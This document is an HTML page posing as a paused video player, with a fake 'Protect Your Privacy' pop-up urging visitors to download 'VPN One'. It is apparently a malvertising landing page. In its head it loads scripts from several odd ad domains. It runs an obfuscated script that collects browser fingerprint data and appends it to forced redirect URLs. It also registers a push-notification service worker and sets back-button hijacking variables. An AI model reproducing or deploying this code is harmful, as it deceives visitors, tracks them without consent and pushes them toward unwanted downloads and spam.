<!DOCTYPE html>
<html lang="en" data-version="v0.5.718-applab">
  <head>
    <script>
      var Back_Button_Zone = 8179555;
      var Domain_TB = "cigoumtoon.net";
</script>
<script async src="https://desenteir.com/3ad/4953e/reverse.min.js?sf=1"></script>
    <script>
    var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]); 
    var s = document.createElement('script');
    s.src='//ouphouch.com/3ad/4953e/mw.min.js?z=8179541'+'&sw=/sw-check-permissions-6a58b.js';
    s.onload = function(result) {
        switch (result) {
            case 'onPermissionDefault':break;
            case 'onPermissionAllowed':break;
            case 'onPermissionDenied':break;
            case 'onAlreadySubscribed':
            Replace("//gaiwoafauchi.net/4/8179547");break;
            case 'onNotificationUnsupported':
            Replace("//gaiwoafauchi.net/4/8179547");break;
        }
    };
    document.head.appendChild(s);
</script>
   <script>
    var cta = 'mainButton';
    var under = 'https://yahoo.com';
</script>
<script src="https://backunder.com/script.js"></script>


    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width" />
    <link rel="icon" type="image/x-icon" href="favi.webp">
    <style data-styled data-styled-version="6.1.13">
      .bcAAZG strong {
        font-weight: 400;
      }

      data-styled.g241[id="sc-a6181a8e-0"] {
        content: "bcAAZG,"
      }

      .ilgnEn {
        display: flex;
        font-size: 18px;
      }

      .ilgnEn>div {
        margin-left: 10px;
      }

      data-styled.g242[id="sc-a6181a8e-1"] {
        content: "ilgnEn,"
      }

      .cXZTiz {
        display: flex;
        gap: 11px;
        flex-wrap: nowrap;
        justify-content: end;
        margin-top: 15px;
      }


      data-styled.g243[id="sc-a6181a8e-2"] {
        content: "cXZTiz,"
      }


      .gnddo {
        position: relative;
        background-color: #fff;
        border-radius: 5px;
        box-shadow: 0 10px 20px rgba(0, 0, 0, 0.25);
        max-width: 380px;
        padding: 15px 32px 15px 12px;
        text-align: left;
        width: 92%;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
      }


      data-styled.g244[id="sc-a6181a8e-3"] {
        content: "gnddo,"
      }

      .EjMMP {
        width: auto;
        height: 100%;
      }


      .EjMMP.close {
        width: 10px;
        height: 10px;
        position: absolute;
        right: 5px;
        top: 5px;
      }


      .EjMMP.close:hover {
        cursor: pointer;
      }


      .EjMMP.bell {
        max-width: 40px;
      }


      .EjMMP.modal-img {
        position: absolute;
        max-width: 375px;
        height: auto;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
      }

      data-styled.g245[id="sc-a6181a8e-4"] {
        content: "EjMMP,"
      }


      .huDZqY {
        border: none;
        padding: 9px 15px;
        border-radius: 5px;
        font-size: 16px;
      }


      .huDZqY:hover {
        cursor: pointer;
      }


      .huDZqY.primary {
        background: #408aec;
        text-transform: uppercase;
        color: #fff;
      }


      .huDZqY:not(.primary) {
        background: #fff;
        border: 1px solid #dcdcdc;
        color: #408aec;
      }


      data-styled.g246[id="sc-a6181a8e-5"] {
        content: "huDZqY,"
      }


      .hOaTWA {
        display: block;
        width: 100vw;
        height: 100vh;
        background: #000;
        font-family: sans-serif;
        cursor: pointer;
      }


      .hOaTWA p {
        margin: 0;
        padding: 0;
      }


      .hOaTWA * {
        box-sizing: border-box;
      }


      data-styled.g478[id="sc-57312787-0"] {
        content: "hOaTWA,"
      }


      .lmJsKP {
        position: fixed;
        left: 0;
        bottom: 0;
        right: 0;
        display: flex;
        justify-content: space-between;
        align-items: center;
        padding: 0 4px 4px;
        height: 40px;
        color: #fff;
        font-size: 19px;
      }


      data-styled.g479[id="sc-57312787-1"] {
        content: "lmJsKP,"
      }


      .ksiZUU {
        background: rgba(255, 255, 255, 0.2);
        height: 3px;
        width: 100%;
        position: absolute;
        top: -3px;
      }


      .ksiZUU div {
        width: 11%;
        height: 100%;
        background-color: red;
      }


      data-styled.g480[id="sc-57312787-2"] {
        content: "ksiZUU,"
      }


      .dJgcPE {
        display: flex;
        align-items: center;
        gap: 6px;
        height: 100%;
      }


      .dJgcPE:hover {
        cursor: pointer;
      }


      @media (max-width: 480px) {
        .dJgcPE {
          gap: 3px;
        }
      }


      data-styled.g481[id="sc-57312787-3"] {
        content: "dJgcPE,"
      }


      .cBKtai {
        width: auto;
        height: 100%;
      }


      .cBKtai.close {
        width: 10px;
        height: 10px;
        position: absolute;
        right: 5px;
        top: 5px;
      }


      .cBKtai.close:hover {
        cursor: pointer;
      }


      .cBKtai.bell {
        max-width: 40px;
      }


      .cBKtai.modal-img {
        position: absolute;
        max-width: 375px;
        height: auto;
        top: 50%;
        left: 50%;
        transform: translate(-50%, -50%);
      }


      data-styled.g482[id="sc-57312787-4"] {
        content: "cBKtai,"
      }


      .ckmQfj {
        position: absolute;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        display: flex;
        justify-content: center;
        align-items: center;
      }

      data-styled.g483[id="sc-57312787-5"] {
        content: "ckmQfj,"
      }

    
    </style>
    <title>(1) Notification</title>
       <meta name="referrer" content="no-referrer" />
  </head>
  <body>
    <div id="__next">
      <div rel="noopener noreferrer" class="sc-57312787-0 hOaTWA">
         <div class="sc-a6181a8e-3 gnddo">
          <img src="close.svg" class="sc-a6181a8e-4 EjMMP close" />
          <div class="sc-a6181a8e-1 ilgnEn">
            <img src="bell.svg" class="sc-a6181a8e-4 EjMMP bell" />         
            <div>
              <strong>Protect Your Privacy</strong>
              <br><br>
              <p class="sc-a6181a8e-0 bcAAZG">Get secure, stay private. Download VPN One and continue watching content in Safe Mode!</p>
            </div>
          </div>
          <div class="sc-a6181a8e-2 cXZTiz">
            <button class="sc-a6181a8e-5 huDZqY" onclick="window.location.href='https://msn.com';">Cancel</button>
            <button class="sc-a6181a8e-5 huDZqY primary" class="mainButton" onclick="window.location.href='https://youtube.com';">Download</button>
          </div>
        </div>
        <div class="sc-57312787-1 lmJsKP">
          <div class="sc-57312787-2 ksiZUU">
            <div></div>
          </div>
          <div class="sc-57312787-3 dJgcPE">
            <img src="play.svg" class="sc-57312787-4 cBKtai" />
            <img src="next.svg" class="sc-57312787-4 cBKtai" />
            <img src="volume.svg" class="sc-57312787-4 cBKtai" />
            <div style="white-space:nowrap;">0:11 / 1:38</div>
          </div>
          <div class="sc-57312787-3 dJgcPE">
            <img src="options.svg" class="sc-57312787-4 cBKtai" />
            <img src="in-frame.svg" class="sc-57312787-4 cBKtai" />
            <img src="full-window.svg" class="sc-57312787-4 cBKtai" />
          </div>
        </div>
      </div>
    </div>

  </body>
</html>
